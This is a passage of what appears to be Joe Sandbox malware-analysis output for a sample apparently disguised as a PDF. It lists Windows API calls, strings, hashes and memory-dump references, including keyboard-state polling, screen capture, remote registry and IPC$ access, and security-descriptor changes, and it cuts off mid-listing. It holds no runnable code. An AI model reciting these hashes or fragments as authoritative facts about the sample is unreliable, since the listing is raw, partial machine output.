                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A9F5
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037AA1B
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037AA2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                                    • Instruction ID: dc4b1dd3540a7bd6bbb80fea157af3c986e89ea2203c1110344ed7a22aba5386
                                                    • Opcode Fuzzy Hash: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                                    • Instruction Fuzzy Hash: 01514B71900619ABDF22DF94DD45EEEBB79FF48300F048129F915EB290D7389A15CB61
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00399E36
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00399E42
                                                    • CreateCompatibleDC.GDI32(?), ref: 00399E4E
                                                    • SelectObject.GDI32(00000000,?), ref: 00399E5B
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00399EAF
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00399EEB
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00399F0F
                                                    • SelectObject.GDI32(00000006,?), ref: 00399F17
                                                    • DeleteObject.GDI32(?), ref: 00399F20
                                                    • DeleteDC.GDI32(00000006), ref: 00399F27
                                                    • ReleaseDC.USER32(00000000,?), ref: 00399F32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 9d7e584e38d5cf866caa2fbb09cacf2337bd1f1df93bffe0626ea0f716d7b2be
                                                    • Instruction ID: e7ee554705653414dc6703bc4cc3d47c959ec6daee2e9f7caddf96562238a821
                                                    • Opcode Fuzzy Hash: 9d7e584e38d5cf866caa2fbb09cacf2337bd1f1df93bffe0626ea0f716d7b2be
                                                    • Instruction Fuzzy Hash: 31514B75900309EFCB16CFA9DC85EAEBBB9EF48310F14842EF99997210D731A941CB90
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2889450990-2391861430
                                                    • Opcode ID: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                                    • Instruction ID: c72edb8c7b987e31140ad957e8533c99dec361aa45a7b5a688b16ef13ad2dfeb
                                                    • Opcode Fuzzy Hash: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                                    • Instruction Fuzzy Hash: 91515C72800209BBCF16FBA0CD46EEEB7B8AF04344F1041A5F5057A1A2EB716F59DB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2889450990-3420473620
                                                    • Opcode ID: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                                    • Instruction ID: e30765386f17c2796baeaa699d2f41ba88f2b2c5dd2e6766fbd526f3e7145e1e
                                                    • Opcode Fuzzy Hash: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                                    • Instruction Fuzzy Hash: F8514B72900609AACF17FBA0DE46EEEB7B8AF04340F104065F5057A0A2EB756F59DB61
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: $E?$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-1016100088
                                                    • Opcode ID: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                                    • Instruction ID: f8e90384901d19ae562fa84e83bdfda071a3fa850a44779aeb92a29af93f0c06
                                                    • Opcode Fuzzy Hash: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                                    • Instruction Fuzzy Hash: F0413B3411024A8BCF07EF14D851AEB3365EF23340F514865FC956F2A2EB70EA4ACB50
                                                    APIs
                                                    • _memset.LIBCMT ref: 003855D7
                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00385664
                                                    • GetMenuItemCount.USER32(00401708), ref: 003856ED
                                                    • DeleteMenu.USER32(00401708,00000005,00000000,000000F5,?,?), ref: 0038577D
                                                    • DeleteMenu.USER32(00401708,00000004,00000000), ref: 00385785
                                                    • DeleteMenu.USER32(00401708,00000006,00000000), ref: 0038578D
                                                    • DeleteMenu.USER32(00401708,00000003,00000000), ref: 00385795
                                                    • GetMenuItemCount.USER32(00401708), ref: 0038579D
                                                    • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 003857D3
                                                    • GetCursorPos.USER32(?), ref: 003857DD
                                                    • SetForegroundWindow.USER32(00000000), ref: 003857E6
                                                    • TrackPopupMenuEx.USER32(00401708,00000000,?,00000000,00000000,00000000), ref: 003857F9
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00385805
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 3993528054-0
                                                    • Opcode ID: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                                    • Instruction ID: 5d43ec4da994b42506c844ce202a057e3678ef3da98df65cc2214e961a418ae8
                                                    • Opcode Fuzzy Hash: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                                    • Instruction Fuzzy Hash: 5B710330640B05BFEB23AB54DC49FAABF69FF00368F644256F618AA1E0D7716C10DB90
                                                    APIs
                                                    • _memset.LIBCMT ref: 0037A1DC
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0037A211
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0037A22D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0037A249
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0037A273
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0037A29B
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2A6
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1687751970-22481851
                                                    • Opcode ID: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                                    • Instruction ID: d45a8476629a2115f15b49067827afa6332355aa2cd5ba1c1bb555689f0b1da9
                                                    • Opcode Fuzzy Hash: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                                    • Instruction Fuzzy Hash: 8741F476C10629ABDF22EBA4DC85DEEB7B8FF04340F014429F905BB161EA74AE05CB51
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 003867FD
                                                    • __swprintf.LIBCMT ref: 0038680A
                                                      • Part of subcall function 0036172B: __woutput_l.LIBCMT ref: 00361784
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00386834
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00386840
                                                    • LockResource.KERNEL32(00000000), ref: 0038684D
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0038686D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 0038687F
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0038688E
                                                    • LockResource.KERNEL32(?), ref: 0038689A
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003868F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID: 5?
                                                    • API String ID: 1433390588-4033248023
                                                    • Opcode ID: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                                    • Instruction ID: 51a8e0c9e1e1376f81e49eb8a556e714b21f0e68bfef4f14879ff4762fefac8b
                                                    • Opcode Fuzzy Hash: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                                    • Instruction Fuzzy Hash: 313170B190021AABDB12AF60DD46EBFBBACEF08340F008865F906E6150E734E951DB64
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003B36F4,00000010,?,Bad directive syntax error,003DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003825D6
                                                    • LoadStringW.USER32(00000000,?,003B36F4,00000010), ref: 003825DD
                                                    • _wprintf.LIBCMT ref: 00382610
                                                    • __swprintf.LIBCMT ref: 00382632
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003826A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 1080873982-4153970271
                                                    • Opcode ID: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                                    • Instruction ID: 5c2710c9e5ffe6eabf9a4907ef39ea0c1bbd638b4ac4d755c447890d46fb2b0d
                                                    • Opcode Fuzzy Hash: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                                    • Instruction Fuzzy Hash: 76212E3191021EBFCF13BB90CC4AEEE7779BF18304F044455F5056A0A2EB75A659DB50
                                                    APIs
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00387B42
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00387B58
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00387B69
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00387B7B
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00387B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: SendString
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 890592661-1007645807
                                                    • Opcode ID: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                                    • Instruction ID: 40aebea6e854e3eb30376271a99cdf79985711f00e30c51b4c1fa4d8290d4a27
                                                    • Opcode Fuzzy Hash: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                                    • Instruction Fuzzy Hash: 3A11C4B0A5025D79D723B761CC4ADFFBABDEB91B40F100419B511AA0D1DA706A49CAB0
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00387794
                                                      • Part of subcall function 0035DC38: timeGetTime.WINMM(?,75C0B400,003B58AB), ref: 0035DC3C
                                                    • Sleep.KERNEL32(0000000A), ref: 003877C0
                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003877E4
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00387806
                                                    • SetActiveWindow.USER32 ref: 00387825
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00387833
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00387852
                                                    • Sleep.KERNEL32(000000FA), ref: 0038785D
                                                    • IsWindow.USER32 ref: 00387869
                                                    • EndDialog.USER32(00000000), ref: 0038787A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                                    • Instruction ID: a86f71a1f049ec1066632c40eefbde938bc9bcef14019cfd6d66270620552d9e
                                                    • Opcode Fuzzy Hash: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                                    • Instruction Fuzzy Hash: F7211870204305AFE7066F20AD89F263F6EFB4534AF1500B8F91696162CB71AD14DB29
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CoInitialize.OLE32(00000000), ref: 0039034B
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003903DE
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 003903F2
                                                    • CoCreateInstance.OLE32(003CDA8C,00000000,00000001,003F3CF8,?), ref: 0039043E
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003904AD
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00390505
                                                    • _memset.LIBCMT ref: 00390542
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0039057E
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003905A1
                                                    • CoTaskMemFree.OLE32(00000000), ref: 003905A8
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003905DF
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 003905E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 67a5b753e8404c66bdff9b37371d16291756b45c2987dd2c2db9a3b405393497
                                                    • Instruction ID: f72dcdaa8a45a9fa24cc5f4555f6eede39f270f6f0a4886688de0905a691017e
                                                    • Opcode Fuzzy Hash: 67a5b753e8404c66bdff9b37371d16291756b45c2987dd2c2db9a3b405393497
                                                    • Instruction Fuzzy Hash: E9B1D875A00209AFDB05DFA4C889DAEBBB9FF49304B1584A9F905EB251DB70EE41CF50
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00382ED6
                                                    • SetKeyboardState.USER32(?), ref: 00382F41
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00382F61
                                                    • GetKeyState.USER32(000000A0), ref: 00382F78
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00382FA7
                                                    • GetKeyState.USER32(000000A1), ref: 00382FB8
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00382FE4
                                                    • GetKeyState.USER32(00000011), ref: 00382FF2
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0038301B
                                                    • GetKeyState.USER32(00000012), ref: 00383029
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00383052
                                                    • GetKeyState.USER32(0000005B), ref: 00383060
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                                    • Instruction ID: 2d4c0220f3c3a9c572ca3773be57b7c72f2000cdc49e19bcd234cdbf4c5efcc6
                                                    • Opcode Fuzzy Hash: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                                    • Instruction Fuzzy Hash: 3A51C670A0478429FB37FBA488107ABBBF49F11740F0945DED5C25A6C2DA54AB8CC7A6
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 0037ED1E
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037ED30
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0037ED8E
                                                    • GetDlgItem.USER32(?,00000002), ref: 0037ED99
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037EDAB
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0037EE01
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037EE0F
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037EE20
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0037EE63
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0037EE71
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0037EE8E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0037EE9B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                                    • Instruction ID: 9426fd1ef48f60f44216bf33655733ba9623656182c41716dd5fcbeda9460554
                                                    • Opcode Fuzzy Hash: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                                    • Instruction Fuzzy Hash: 5A512DB1B00205AFDB19CF68DD89EAEBBBAEB88300F558579F519D7290D774AD00CB10
                                                    APIs
                                                      • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0035B72B), ref: 0035B7F6
                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 0035B88D
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 003BD8A6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8D7
